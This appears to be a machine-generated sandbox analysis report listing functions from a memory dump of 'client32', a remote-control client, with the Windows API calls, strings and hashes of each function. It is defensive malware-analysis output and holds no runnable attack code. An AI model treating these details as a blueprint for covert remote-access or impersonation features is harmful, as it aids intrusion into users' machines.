                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: RectWindow$Item$ErrorExitLastMessageProcesswsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 2038946005-2830328467
                                                                              • Opcode ID: 620dae07eedfae8235f2d3a280bb26459a1a4424cf46755cf2ac384f868e5aac
                                                                              • Instruction ID: 1bb08d0e26d3f84db878e7f9f950f280f16ec03f41355f49a35b763b070fbd80
                                                                              • Opcode Fuzzy Hash: 620dae07eedfae8235f2d3a280bb26459a1a4424cf46755cf2ac384f868e5aac
                                                                              • Instruction Fuzzy Hash: 89315C74D0031AEFCB14DFB5C984AEEFBB9FB48308F108569E51667604EB71A954CB90
                                                                              Function 11148360 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 74keyboardCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetLastError.KERNEL32(?,?,?,?,1102EA98,?), ref: 1114837D
                                                                              • wsprintfA.USER32 ref: 1114839B
                                                                              • OutputDebugStringA.KERNEL32(?,?,1102EA98,?), ref: 111483B1
                                                                                • Part of subcall function 111449B0: GetTickCount.KERNEL32 ref: 11144A18
                                                                                • Part of subcall function 11148010: GetCurrentThreadId.KERNEL32 ref: 11148023
                                                                                • Part of subcall function 11148010: wsprintfA.USER32 ref: 111480A3
                                                                                • Part of subcall function 11148010: IsBadReadPtr.KERNEL32(?,00000001), ref: 111480C8
                                                                                • Part of subcall function 11148010: wsprintfA.USER32 ref: 111480E8
                                                                                • Part of subcall function 11148010: wsprintfA.USER32 ref: 11148105
                                                                              • OutputDebugStringA.KERNEL32(?,?,?,?,?,?,?,?,1102EA98,?), ref: 111483F6
                                                                              • SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,1102EA98,?), ref: 111483F9
                                                                                • Part of subcall function 110B7F30: GetLastError.KERNEL32(1111025B,11195AD8,?,?,11029B81,?,11195AD8,1111025B,00000000), ref: 110B7F5C
                                                                                • Part of subcall function 110B7F30: _strrchr.LIBCMT ref: 110B7F6B
                                                                                • Part of subcall function 110B7F30: _strrchr.LIBCMT ref: 110B7F8D
                                                                                • Part of subcall function 110B7F30: GetTickCount.KERNEL32 ref: 110B7FBD
                                                                                • Part of subcall function 110B7F30: GetTickCount.KERNEL32 ref: 110B7FE8
                                                                                • Part of subcall function 110B7F30: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110B800C
                                                                                • Part of subcall function 110B7F30: TranslateMessage.USER32(?), ref: 110B8015
                                                                                • Part of subcall function 110B7F30: DispatchMessageA.USER32(?), ref: 110B801E
                                                                              • GetKeyState.USER32(00000011), ref: 11148419
                                                                              Strings
                                                                              • Exception caught at %x. Trying minidump., xrefs: 11148395
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: wsprintf$CountErrorLastMessageTick$DebugOutputString_strrchr$CurrentDispatchReadStateThreadTranslate
                                                                              • String ID: Exception caught at %x. Trying minidump.
                                                                              • API String ID: 490122820-543155386
                                                                              • Opcode ID: a73f62b9da39a5c4804c9e0f52be66233fdaa3bbbff3939df8d171118b33f9c2
                                                                              • Instruction ID: 29a59b4c4c914cd8c532226d15f5e4317bff798f4e19c00b73adffff4a71f3ad
                                                                              • Opcode Fuzzy Hash: a73f62b9da39a5c4804c9e0f52be66233fdaa3bbbff3939df8d171118b33f9c2
                                                                              • Instruction Fuzzy Hash: 3121F875D002189BD715DBA4DDC0FD9F3B8EB1C709F0040A8EA1597A84DBB06E84CFA5
                                                                              Function 110812A0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 74COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memmove.LIBCMT ref: 1108132F
                                                                              • _memset.LIBCMT ref: 11081318
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitLastMessageProcess_memmove_memsetwsprintf
                                                                              • String ID: ..\CTL32\DataStream.cpp$IsA()$m_iPos>=nBytes$nBytes>=0$pData
                                                                              • API String ID: 75970324-4264523126
                                                                              • Opcode ID: d8c9cfc558a83648f442f3398f9905bd9548d166cd1f75af1a89d4c0a32f60db
                                                                              • Instruction ID: 3f790bad6e390bc8ea8a8f21c3872a9d67b2f4e4425326796fba8d3d5e2d5bab
                                                                              • Opcode Fuzzy Hash: d8c9cfc558a83648f442f3398f9905bd9548d166cd1f75af1a89d4c0a32f60db
                                                                              • Instruction Fuzzy Hash: 6B11EB7DF143126FC605DF41EC43F9AF3D4AF9064CF108039E94A27241E571B808C6A1
                                                                              Function 11106190 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 73COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 111061AF
                                                                              • EnterCriticalSection.KERNEL32(111F160C,?,00000000,1114E33E,AB86ACF8,?,?,1118D473,000000FF,?,1114E7EB,00000000,?,111CD988), ref: 111061B8
                                                                              • GetTickCount.KERNEL32 ref: 111061BE
                                                                              • GetTickCount.KERNEL32 ref: 11106245
                                                                              • LeaveCriticalSection.KERNEL32(111F160C,?,00000000,1114E33E,AB86ACF8,?,?,1118D473,000000FF,?,1114E7EB,00000000,?,111CD988), ref: 1110624E
                                                                              Strings
                                                                              • Warning. took %d ms to get simap lock, xrefs: 111061CA
                                                                              • Warning. simap lock held for %d ms, xrefs: 11106261
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountTick$CriticalSection$EnterLeave
                                                                              • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock
                                                                              • API String ID: 956672424-625438208
                                                                              • Opcode ID: f8ece47c6be674cfc6cbb52fd4534d0e4ed0937040c1bec23388106697da3059
                                                                              • Instruction ID: 7bf4b4de6c1225bf845d1b57b19833cf2f95df170fbc6f728bfd986e642e3a36
                                                                              • Opcode Fuzzy Hash: f8ece47c6be674cfc6cbb52fd4534d0e4ed0937040c1bec23388106697da3059
                                                                              • Instruction Fuzzy Hash: F821C278E052A59FE706DFA4DA94F15FBE1AB4631CF2548B9D4068B652C730DC84C741
                                                                              Function 11028290 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 72libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(Kernel32.dll,AB86ACF8,?,00000000), ref: 110282C1
                                                                              • GetProcAddress.KERNEL32(00000000,GetProductInfo), ref: 11028308
                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,1117FB78), ref: 11028334
                                                                              • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,1117FB78), ref: 11028350
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Library$AddressErrorFreeLastLoadProc
                                                                              • String ID: 8$GetProductInfo$Kernel32.dll
                                                                              • API String ID: 2540614322-3445568372
                                                                              • Opcode ID: aa26be5f8cbbfd869b96a8c783efff813acd0f8cb5c7f6c090b51664995c8e87
                                                                              • Instruction ID: 8301ff5709e053f562061a61a0d53d896ae4a996452523829adbc8398c520df5
                                                                              • Opcode Fuzzy Hash: aa26be5f8cbbfd869b96a8c783efff813acd0f8cb5c7f6c090b51664995c8e87
                                                                              • Instruction Fuzzy Hash: 3D21CFB1D4129CAFDB10CFDAD9C4AEDFBF8FB09614F90816EE429A6644D7340A008B61
                                                                              Function 1108C280 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 64threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindWindowA.USER32(?,00000000), ref: 1108C2B4
                                                                              • GetWindowThreadProcessId.USER32(00000000,04000000), ref: 1108C2D3
                                                                              • OpenProcess.KERNEL32(00000440,00000000,04000000,110ED099,?,04000000,00000000,?,00000000,00000000,?,00000000,110ECF7D,?,110ED099,0000070B), ref: 1108C2E9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ProcessWindow$FindOpenThread
                                                                              • String ID: Error. NULL hToken$Progman
                                                                              • API String ID: 3432422346-976623215
                                                                              • Opcode ID: 27d9adcea033cca8a9313adc041a3d51743ac848c4f94076432c31519aeea56b
                                                                              • Instruction ID: a798542badd3240e5ba587e482d1b03e6f16632b9767cf240999fd85d1b1ba7e
                                                                              • Opcode Fuzzy Hash: 27d9adcea033cca8a9313adc041a3d51743ac848c4f94076432c31519aeea56b
                                                                              • Instruction Fuzzy Hash: 8A11D676E4021C9BD714CFF4C985BEDF7F8DB4C219F0041A9E916A7644DB71A900CBA0
                                                                              Function 11028360 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 61COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 11028290: LoadLibraryA.KERNEL32(Kernel32.dll,AB86ACF8,?,00000000), ref: 110282C1
                                                                                • Part of subcall function 11028290: GetProcAddress.KERNEL32(00000000,GetProductInfo), ref: 11028308
                                                                                • Part of subcall function 11028290: FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,1117FB78), ref: 11028334
                                                                              • ImpersonateLoggedOnUser.ADVAPI32(00000000), ref: 110283A3
                                                                              • GetUserNameA.ADVAPI32(?,?), ref: 110283BC
                                                                              • RevertToSelf.ADVAPI32 ref: 110283DC
                                                                              • CloseHandle.KERNEL32(00000000), ref: 110283E3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LibraryUser$AddressCloseFreeHandleImpersonateLoadLoggedNameProcRevertSelf
                                                                              • String ID: @$IsMultiPointShell hUser=%p, user=%s, sesh=%d$SRCShell
                                                                              • API String ID: 2421214410-2753544478
                                                                              • Opcode ID: 4218291dc0949de53468530136ce9ee69e83e14b3ed088a51870e52bbe8e6e97
                                                                              • Instruction ID: a3b5864e1cd91ce2ca378080a24cbbe269bd62ca1436d7be2fb329270c9e10de
                                                                              • Opcode Fuzzy Hash: 4218291dc0949de53468530136ce9ee69e83e14b3ed088a51870e52bbe8e6e97
                                                                              • Instruction Fuzzy Hash: 8D110A3AD011299FDB00DFF4DD84AEEF7ECAF05309B45017AE91593240DB30A609C795
                                                                              Function 11003310 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 37windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadMenuA.USER32(00000000,00002EF9), ref: 1100331D
                                                                              • GetSubMenu.USER32(00000000,00000000), ref: 11003343
                                                                              • GetMenuItemCount.USER32(00000000), ref: 11003367
                                                                              • DestroyMenu.USER32(00000000), ref: 11003379
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Menu$CountDestroyErrorExitItemLastLoadMessageProcesswsprintf
                                                                              • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                              • API String ID: 4241058051-934300333
                                                                              • Opcode ID: 85d4a40678ea7b6d13a0383658e2681328b2af046e894752399e51aa99d6900d
                                                                              • Instruction ID: a78e3c2f88e64c1b086a81e8c9a2b46f663d882bee818e15e56a3ec0b04889ae
                                                                              • Opcode Fuzzy Hash: 85d4a40678ea7b6d13a0383658e2681328b2af046e894752399e51aa99d6900d
                                                                              • Instruction Fuzzy Hash: AEF02E36E9093A73D25212B72C4AFCFF6584F456ADB500031F922B5645EE14A40053A9
                                                                              Function 111442D0 Relevance: 12.1, APIs: 8, Instructions: 85COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(?,00000000,?,75BF8400), ref: 111442F0
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11144303
                                                                              • GetFileVersionInfoSizeA.VERSION(?,?), ref: 11144323
                                                                              • _malloc.LIBCMT ref: 1114432F
                                                                                • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                              • GetFileVersionInfoA.VERSION(?,?,00000000,00000000,?), ref: 1114434D
                                                                              • _free.LIBCMT ref: 1114435D
                                                                                • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                              • VerQueryValueA.VERSION(?,1119A5BC,?,?,?,?,00000000,00000000,?), ref: 1114438E
                                                                              • _free.LIBCMT ref: 111443B1
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$HeapInfoModuleVersion_free$AllocateErrorFreeHandleLastNameQuerySizeValue_malloc
                                                                              • String ID:
                                                                              • API String ID: 1929493397-0
                                                                              • Opcode ID: edd211c50a3777fb5ac3ae8ca10e20c72d94fd26d850039a83edcecaba31b236
                                                                              • Instruction ID: 533d070b008c48d0019e4fafecd2d90481fbd6e663e37e79b598d21e300b118d
                                                                              • Opcode Fuzzy Hash: edd211c50a3777fb5ac3ae8ca10e20c72d94fd26d850039a83edcecaba31b236
                                                                              • Instruction Fuzzy Hash: 242161769001299BDB14DF64DC44EDEF3BCEF58714F004199E94997200DAB1AE94CF90
                                                                              Function 1101B530 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 204libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 110DEB60: EnterCriticalSection.KERNEL32(111EE0A4,11018BE8,AB86ACF8,?,?,?,111CD988,11187878,000000FF,?,1101ABB2), ref: 110DEB61
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                              • std::exception::exception.LIBCMT ref: 1101B776
                                                                              • __CxxThrowException@8.LIBCMT ref: 1101B791
                                                                              • LoadLibraryA.KERNEL32(NSSecurity.dll,00000000,111CD988), ref: 1101B7AE
                                                                                • Part of subcall function 11008DD0: std::_Xinvalid_argument.LIBCPMT ref: 11008DEA
                                                                              Strings
                                                                              • NSSecurity.dll, xrefs: 1101B7A3
                                                                              • NsAppSystem Info : Control Channel Sending Command : %d, xrefs: 1101B6E9
                                                                              • NsAppSystem Info : Control Channel Command Sent : %d, xrefs: 1101B70A
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
